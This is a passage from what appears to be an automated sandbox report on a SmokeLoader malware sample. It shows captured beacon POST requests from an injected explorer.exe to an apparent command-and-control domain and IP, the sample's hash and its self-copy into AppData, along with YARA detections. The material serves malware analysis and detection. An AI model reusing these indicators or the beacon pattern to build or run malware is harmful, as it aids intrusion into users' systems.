            Nov 18, 2021 10:44:31.842526913 CET | 1447               | OUT       | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://mrirybsj.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 362
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:32.039333105 CET | 1447               | IN        | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:31 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 43
            Connection: close
            Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 0c 2c 85 07 1f d1 2c 50 d3
            Data Ascii: gs'h],,P


            Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
            3          | 192.168.2.3 | 49789       | 5.188.88.118   | 80               | C:\Windows\explorer.exe
            Timestamp                           | kBytes transferred | Direction | Data
            Nov 18, 2021 10:44:50.264198065 CET | 2299               | OUT       | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tmmykkqa.org/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 205
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:50.649455070 CET | 2301               | IN        | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:50 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 46
            Connection: close
            Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 2c 30 82 06 0a 92 71 1e 98 ef c5 4a
            Data Ascii: gs'h],0qJ


            Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
            4          | 192.168.2.3 | 49819       | 5.188.88.118   | 80               | C:\Windows\explorer.exe
            Timestamp                           | kBytes transferred | Direction | Data
            Nov 18, 2021 10:45:15.836029053 CET | 8493               | OUT       | POST / HTTP/1.1
            Cache-Control: no-cache
            Connection: Keep-Alive
            Pragma: no-cache
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://rsuehfidvdkfvk.top/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 423
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:45:16.057694912 CET | 8494               | IN        | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:45:16 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 406
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 73 75 65 68 66 69 64 76 64 6b 66 76 6b 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at rsuehfidvdkfvk.top Port 80</address></body></html>


            Code Manipulations

            Statistics

            Behavior

            System Behavior

            General

            Start time:10:43:42
            Start date:18/11/2021
            Path:C:\Users\user\Desktop\1RMZ62tUAl.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\1RMZ62tUAl.exe"
            Imagebase:0x400000
            File size:285184 bytes
            MD5 hash:8696A4269E30DDB34A7E0E84629EDE03
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:10:43:55
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:10:44:30
            Start date:18/11/2021
            Path:C:\Users\user\AppData\Roaming\favdejf
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\favdejf
            Imagebase:0x400000
            File size:285184 bytes
            MD5 hash:8696A4269E30DDB34A7E0E84629EDE03
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 56%, ReversingLabs
            Reputation:low

            General

            Start time:10:45:11
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:10:45:13
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:10:45:15
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:10:45:18
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:10:45:20
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:10:45:22
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:10:45:24
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:10:45:26
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:10:45:29
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Start time:10:45:32
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Start time:10:45:34
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Start time:10:45:36
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Start time:10:45:38
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Disassembly

            Code Analysis
